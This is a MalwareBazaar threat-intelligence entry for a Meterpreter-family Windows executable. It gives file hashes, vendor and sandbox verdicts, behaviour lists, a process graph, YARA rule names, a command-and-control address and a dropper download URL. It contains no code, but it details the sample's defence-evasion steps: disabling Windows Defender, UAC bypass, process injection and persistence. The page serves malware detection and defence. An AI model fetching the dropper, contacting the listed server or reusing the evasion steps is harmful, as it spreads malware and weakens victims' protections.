MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 1622d2b40a4fdbbb296ecf1e6668fbdbe6f10b84ffa1bb15217b91924cc71a29. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Meterpreter


Vendor detections: 15


Intelligence 15 IOCs 2 YARA 19 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 1622d2b40a4fdbbb296ecf1e6668fbdbe6f10b84ffa1bb15217b91924cc71a29
SHA3-384 hash: cdb5382b1d8631b192c1db9d3b95b2af4c9a8b8995cb285727857fff861421131955320b2409ddae71ab063364933ce4
SHA1 hash: 33e55b7d68f1201200c430de06920b6e5d93080e
MD5 hash: e47133883942fa94487bc7dd9319cd1b
humanhash: lemon-red-item-triple
File name:e47133883942fa94487bc7dd9319cd1b.exe
Download: download sample
Signature Meterpreter
Create hunting rule
File size:10'978'959 bytes
First seen:2025-08-18 15:35:19 UTC
Last seen:Never
File type:Executable exe
MIME type:application/x-dosexec
imphash 965e162fe6366ee377aa9bc80bdd5c65 (45 x BlankGrabber, 13 x CoinMiner, 9 x Efimer)
ssdeep 196608:S0iw0W8/LaX5A1HeT39IigbauDXURuA3dSYEQVdnSEXPEX:sXW8B1+TtIihuARuA3dS9QV88PEX
Threatray 1'257 similar samples on MalwareBazaar
TLSH T1BFB633C977AA08E8D89ED23FD2D5465BA79270A647A883CB6BF00C410F275E4DF35B41
TrID 66.6% (.EXE) InstallShield setup (43053/19/16)
16.2% (.EXE) Win64 Executable (generic) (10522/11/4)
7.7% (.EXE) Win16 NE executable (generic) (5038/12/1)
3.1% (.EXE) OS/2 Executable (generic) (2029/13)
3.0% (.EXE) Generic Win/DOS Executable (2002/3)
Magika pebin
dhash icon f1e8b2ec8cccdc6c (1 x Meterpreter)
Reporter abuse_ch
Tags:exe Meterpreter


Avatar
abuse_ch
Meterpreter C2:
5.83.218.183:4470

Indicators Of Compromise (IOCs)

Below is a list of indicators of compromise (IOCs) associated with this malware samples.

IOCThreatFox Reference
5.83.218.183:4470 https://threatfox.abuse.ch/ioc/1570733/
5.83.218.183:4670 https://threatfox.abuse.ch/ioc/1570734/

Intelligence

File Origin
# of uploads :
1
# of downloads :
58
Origin country :
NL NL
Vendor Threat Intelligence
Malware family:
n/a
ID:
1
File name:
Loader.exe
Verdict:
No threats detected
Analysis date:
2025-08-14 04:38:50 UTC
Tags:
n/a
Link:
https://app.any.run/tasks/365afd7d-5ada-460e-b162-b6b81316ce61

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection:
n/a
Link:
https://www.capesandbox.com/analysis/21971/
Detection(s):
SecuriteInfo.com.Python.Packed.104.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
96.5%
Link:
https://cyber-fortress.com/docs/result/index.php?id=68a348628fd55a79c52909d7
Tags:
metasploit trojan shell sage
Result
Verdict:
Malware
Maliciousness:

Behaviour
Creating a file in the %temp% subdirectories
Restart of the analyzed sample
Creating a window
Running batch commands
Creating a process with a hidden window
Launching a process
Сreating synchronization primitives
Searching for synchronization primitives
Connection attempt
Sending an HTTP GET request
Creating a file
Sending a custom TCP request
Creating a process from a recently created file
Launching cmd.exe command interpreter
Using obfuscated Powershell scripts
Unauthorized injection to a system process
Verdict:
Likely Malicious
Threat level:
  7.5/10
Confidence:
100%
Tags:
expand lolbin microsoft_visual_cc overlay overlay packed packed pyinstaller threat
Link:
https://www.filescan.io/uploads/68a34858abfbaec31824e97a/reports/1698674e-6615-48bf-b8bf-8289a2e5ca18/overview
Verdict:
Malicious
Labled as:
Tedy.Generic
Link:
https://www.hybrid-analysis.com/sample/1622d2b40a4fdbbb296ecf1e6668fbdbe6f10b84ffa1bb15217b91924cc71a29
Verdict:
Unknown
Link:
https://analyze.intezer.com/analyses/3fa8f029-12a9-4e3d-b193-babc51281264
Result
Threat name:
Metasploit, Meterpreter
Create hunting rule
Detection:
malicious
Classification:
phis.troj.spyw.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1759441
Signature
Adds extensions / path to Windows Defender exclusion list (Registry)
AI detected malicious Powershell script
Allocates memory in foreign processes
Antivirus detection for dropped file
Blacklisted process start detected (Windows program)
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to change the desktop window for a process (likely to hide graphical interactions)
Contains functionality to check if the process is started with administrator privileges
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Disable Microsoft Windows Malicious Software Removal Tool Heartbeat Telemetry
Disable UAC(promptonsecuredesktop)
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disable Windows Defender Security Center Settings (registry)
Disables the Smart Screen filter
Disables virtualization based memory integrity
Disables Windows Defender (deletes autostart)
Disables Windows Defender Tamper protection
Encrypted powershell cmdline option found
Found malware configuration
Found pyInstaller with non standard icon
Found suspicious powershell code related to unpacking or dynamic code loading
Found suspicious ZIP file
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Malicious sample detected (through community Yara rule)
Modifies controlled folder access of windows defender exploit guard
Modifies security policies related information
Modifies Windows Defender signatures updates days
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspect Svchost Activity
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suricata IDS alerts for network traffic
Suspicious powershell command line found
Uses bcdedit to modify the Windows boot settings
Uses known network protocols on non-standard ports
Uses regedit.exe to modify the Windows registry
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Metasploit Payload
Yara detected MetasploitPayload
Yara detected Meterpreter
Yara detected Powershell download and execute
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1759441 Sample: 4nSoi8xhY4.exe Startdate: 18/08/2025 Architecture: WINDOWS Score: 100 165 Suricata IDS alerts for network traffic 2->165 167 Found malware configuration 2->167 169 Malicious sample detected (through community Yara rule) 2->169 171 25 other signatures 2->171 14 4nSoi8xhY4.exe 1001 2->14         started        18 winfirewall.exe 2->18         started        20 svchost.exe 2->20         started        23 rundll32.exe 2->23         started        process3 dnsIp4 153 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 14->153 dropped 155 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+ 14->155 dropped 157 C:\Users\user\AppData\Local\...\tk86t.dll, PE32+ 14->157 dropped 159 51 other malicious files 14->159 dropped 251 Suspicious powershell command line found 14->251 253 Bypasses PowerShell execution policy 14->253 255 Found pyInstaller with non standard icon 14->255 25 4nSoi8xhY4.exe 14->25         started        257 Writes to foreign memory regions 18->257 259 Allocates memory in foreign processes 18->259 261 Creates a thread in another existing process (thread injection) 18->261 263 Injects a PE file into a foreign processes 18->263 27 svchost.exe 18->27         started        163 127.0.0.1 unknown unknown 20->163 file5 signatures6 process7 process8 29 powershell.exe 25->29         started        33 cmd.exe 1 25->33         started        35 cmd.exe 1 25->35         started        37 cmd.exe 25->37         started        file9 147 C:\Users\Public\Documents\...\PowerRun.exe, PE32+ 29->147 dropped 149 C:\Users\Public\Documents\...\Script_Run.bat, DOS 29->149 dropped 151 C:\Users\Public\...\WindowsSettings.zip, Zip 29->151 dropped 241 Loading BitLocker PowerShell Module 29->241 39 cmd.exe 29->39         started        42 conhost.exe 29->42         started        44 cmd.exe 1 33->44         started        46 conhost.exe 33->46         started        243 Suspicious powershell command line found 35->243 245 Encrypted powershell cmdline option found 35->245 247 Uses schtasks.exe or at.exe to add and modify task schedules 35->247 249 Uses bcdedit to modify the Windows boot settings 35->249 48 cmd.exe 1 35->48         started        50 conhost.exe 35->50         started        52 cmd.exe 37->52         started        54 conhost.exe 37->54         started        signatures10 process11 signatures12 203 Uses bcdedit to modify the Windows boot settings 39->203 56 powershell.exe 39->56         started        60 PowerRun.exe 39->60         started        62 PowerRun.exe 39->62         started        71 6 other processes 39->71 205 Suspicious powershell command line found 44->205 64 powershell.exe 22 44->64         started        67 powershell.exe 14 20 48->67         started        207 Encrypted powershell cmdline option found 52->207 69 powershell.exe 52->69         started        process13 dnsIp14 135 C:\Users\user\AppData\...\WimProvider.dll.mui, PE32 56->135 dropped 137 C:\Users\user\AppData\...\VhdProvider.dll.mui, PE32 56->137 dropped 139 C:\Users\user\...\UnattendProvider.dll.mui, PE32 56->139 dropped 145 47 other malicious files 56->145 dropped 209 Loading BitLocker PowerShell Module 56->209 73 DismHost.exe 56->73         started        75 Dism.exe 56->75         started        211 Multi AV Scanner detection for dropped file 60->211 213 Uses regedit.exe to modify the Windows registry 60->213 77 PowerRun.exe 60->77         started        79 PowerRun.exe 62->79         started        161 5.83.218.183, 4670, 49696, 49697 BRIGHTBOX-ASGB United Kingdom 64->161 141 C:\Users\Public\Documents\WindowsScreen.exe, PE32+ 64->141 dropped 81 WindowsScreen.exe 64->81         started        143 C:\Users\Public\Documents\svhost.exe, PE32+ 67->143 dropped 215 Suspicious powershell command line found 67->215 217 Obfuscated command line found 67->217 219 Found suspicious powershell code related to unpacking or dynamic code loading 67->219 221 Powershell drops PE file 67->221 85 svhost.exe 67->85         started        87 powershell.exe 69->87         started        223 Disables Windows Defender (deletes autostart) 71->223 89 PowerRun.exe 71->89         started        91 Conhost.exe 71->91         started        file15 signatures16 process17 file18 93 PowerRun.exe 77->93         started        95 PowerRun.exe 79->95         started        125 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 81->125 dropped 127 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+ 81->127 dropped 129 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 81->129 dropped 131 46 other malicious files 81->131 dropped 173 Multi AV Scanner detection for dropped file 81->173 175 Found pyInstaller with non standard icon 81->175 97 WindowsScreen.exe 81->97         started        177 Antivirus detection for dropped file 85->177 179 Writes to foreign memory regions 85->179 181 Allocates memory in foreign processes 85->181 183 2 other signatures 85->183 101 svchost.exe 85->101         started        103 conhost.exe 87->103         started        signatures19 process20 file21 105 regedit.exe 93->105         started        108 regedit.exe 95->108         started        133 C:\Users\user\AppData\...\winfirewall.exe, PE32+ 97->133 dropped 185 Creates an undocumented autostart registry key 97->185 110 cmd.exe 97->110         started        112 cmd.exe 97->112         started        187 Contains functionality to change the desktop window for a process (likely to hide graphical interactions) 101->187 189 Contains functionality to inject threads in other processes 101->189 191 Contains functionality to inject code into remote processes 101->191 193 Contains functionality to check if the process is started with administrator privileges 101->193 signatures22 process23 signatures24 225 Changes security center settings (notifications, updates, antivirus, firewall) 105->225 227 Changes the view of files in windows explorer (hidden files and folders) 105->227 229 Blacklisted process start detected (Windows program) 105->229 237 7 other signatures 105->237 231 Disables virtualization based memory integrity 108->231 233 Disable Microsoft Windows Malicious Software Removal Tool Heartbeat Telemetry 108->233 235 Disables the Smart Screen filter 108->235 239 3 other signatures 108->239 114 winfirewall.exe 110->114         started        117 conhost.exe 110->117         started        119 conhost.exe 112->119         started        121 schtasks.exe 112->121         started        process25 signatures26 195 Writes to foreign memory regions 114->195 197 Allocates memory in foreign processes 114->197 199 Creates a thread in another existing process (thread injection) 114->199 201 Injects a PE file into a foreign processes 114->201 123 svchost.exe 114->123         started        process27
Score:
99%
Verdict:
Malware
File Type:
PE
Link:
https://malprob.io/report/1622d2b40a4fdbbb296ecf1e6668fbdbe6f10b84ffa1bb15217b91924cc71a29
Verdict:
inconclusive
YARA:
5 match(es)
Tags:
Executable PDB Path PE (Portable Executable) PE File Layout Win 64 Exe x64
Link:
https://app.malva.re/file/e47133883942fa94487bc7dd9319cd1b
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/1622d2b40a4fdbbb296ecf1e6668fbdbe6f10b84ffa1bb15217b91924cc71a29/
Verdict:
Malicious
Threat:
Trojan.Tedy
Link:
https://tip.neiki.dev/file/1622d2b40a4fdbbb296ecf1e6668fbdbe6f10b84ffa1bb15217b91924cc71a29
Threat name:
Win64.Trojan.Egairtigado
Create hunting rule
Status:
Malicious
First seen:
2025-08-14 04:38:52 UTC
File Type:
PE+ (Exe)
Extracted files:
1600
AV detection:
12 of 24 (50.00%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=cyrnfnakj7n3wkloz4pgm2h33ptpcc4e76q3wfjbpoizetghdiuq._file
Verdict:
malicious
Label(s):
metasploit
Create hunting rule
Similar samples:
003e601b4d70f8a25ea0c1fab52556aa24d00192d91b2cb5c528579f4548702a
Meterpreter
80ca628cea4cc5e3a5041f2986d3b6e8b97981c9395f289958c2ec87d7c94c90
Meterpreter
93e9c2abaa3e7eb97fdd7fa3366b6f176b0c3cfbc44de24926660b78ae149943
Meterpreter
d22517dafccc940c38f7fc6004d215d9fa9a7a1da8f0c7f2b552be3bcfb94767
Meterpreter
de4bcc6c8c5f9a4027d6c2bcaabef6eebe9d0e290761beafe8c0358aa5d24556
Meterpreter
error
Meterpreter
+ 1'247 additional samples on MalwareBazaar
Result
Malware family:
metasploit
Create hunting rule
Score:
  10/10
Tags:
family:metasploit backdoor credential_access defense_evasion evasion execution persistence privilege_escalation pyinstaller ransomware trojan
Link:
https://tria.ge/reports/250818-s1r7wsaj5v/
Behaviour
Delays execution with timeout.exe
Modifies data under HKEY_USERS
Modifies registry class
Runs .reg file with regedit
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Detects Pyinstaller
Enumerates physical storage devices
Drops file in Windows directory
Adds Run key to start application
Indicator Removal: File Deletion
Boot or Logon Autostart Execution: LSASS Driver
Drops startup file
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
Boot or Logon Autostart Execution: Active Setup
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Modifies trusted root certificate store through registry
Modify Registry: Disable Windows Driver Blocklist
Modifies boot configuration data using bcdedit
MetaSploit
Metasploit family
Modifies Windows Defender DisableAntiSpyware settings
Modifies Windows Defender Real-time Protection settings
Modifies Windows Defender TamperProtection settings
Modifies Windows Defender notification settings
Modifies firewall policy service
Modifies security service
UAC bypass
Windows security bypass
Malware Config
C2 Extraction:
5.83.218.183:4470
Dropper Extraction:
http://5.83.218.183:666/WindowsSettings.zip
Verdict:
Suspicious
Tags:
n/a
YARA:
n/a
Link:
https://app.threat.zone/submission/a1669162-2500-4efe-a738-85a31d54c6a5
Unpacked files
SH256 hash:
1622d2b40a4fdbbb296ecf1e6668fbdbe6f10b84ffa1bb15217b91924cc71a29
MD5 hash:
e47133883942fa94487bc7dd9319cd1b
SHA1 hash:
33e55b7d68f1201200c430de06920b6e5d93080e
Link:
https://www.unpac.me/results/3dc9a89b-5dc2-413e-af5a-305018563901/
Malware family:
Metasploit
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/1622d2b40a4f/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/1622d2b40a4fdbbb296ecf1e6668fbdbe6f10b84ffa1bb15217b91924cc71a29

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:APT_Lazarus_Loader_Dec_2020_1
Create hunting rule
Author:Arkbird_SOLG
Description:Detect loader used by Lazarus group in december 2020
Reference:Internal Research
Rule name:DebuggerCheck__API
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:DebuggerCheck__QueryInfo
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:DebuggerException__SetConsoleCtrl
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:Detect_PyInstaller
Create hunting rule
Author:Obscurity Labs LLC
Description:Detects PyInstaller compiled executables across platforms
Rule name:Detect_Remcos_RAT
Create hunting rule
Author:daniyyell
Description:Detects Remcos RAT payloads and commands
Rule name:golang_bin_JCorn_CSC846
Create hunting rule
Author:Justin Cornwell
Description:CSC-846 Golang detection ruleset
Rule name:lsadump
Create hunting rule
Author:Benjamin DELPY (gentilkiwi)
Description:LSA dump programe (bootkey/syskey) – pwdump and others
Rule name:MALWARE_Win_Meterpreter
Create hunting rule
Author:ditekSHen
Description:Detects Meterpreter payload
Rule name:meth_peb_parsing
Create hunting rule
Author:Willi Ballenthin
Rule name:PyInstaller
Create hunting rule
Author:@bartblaze
Description:Identifies executable converted using PyInstaller. This rule by itself does NOT necessarily mean the detected file is malicious.
Rule name:Sus_Obf_Enc_Spoof_Hide_PE
Create hunting rule
Author:XiAnzheng
Description:Check for Overlay, Obfuscating, Encrypting, Spoofing, Hiding, or Entropy Technique(can create FP)
Rule name:ThreadControl__Context
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:upxHook
Create hunting rule
Author:@r3dbU7z
Description:Detect artifacts from 'upxHook' - modification of UPX packer
Reference:https://bazaar.abuse.ch/sample/6352be8aa5d8063673aa428c3807228c40505004320232a23d99ebd9ef48478a/
Rule name:Windows_Trojan_Metasploit_38b8ceec
Create hunting rule
Description:Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon).
Rule name:Windows_Trojan_Metasploit_47f5d54a
Create hunting rule
Author:Elastic Security
Rule name:Windows_Trojan_Metasploit_7bc0f998
Create hunting rule
Description:Identifies the API address lookup function leverage by metasploit shellcode
Rule name:Windows_Trojan_Metasploit_c9773203
Create hunting rule
Description:Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.
Reference:https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Cape
Cape
https://www.capesandbox.com/analysis/21971/

Comments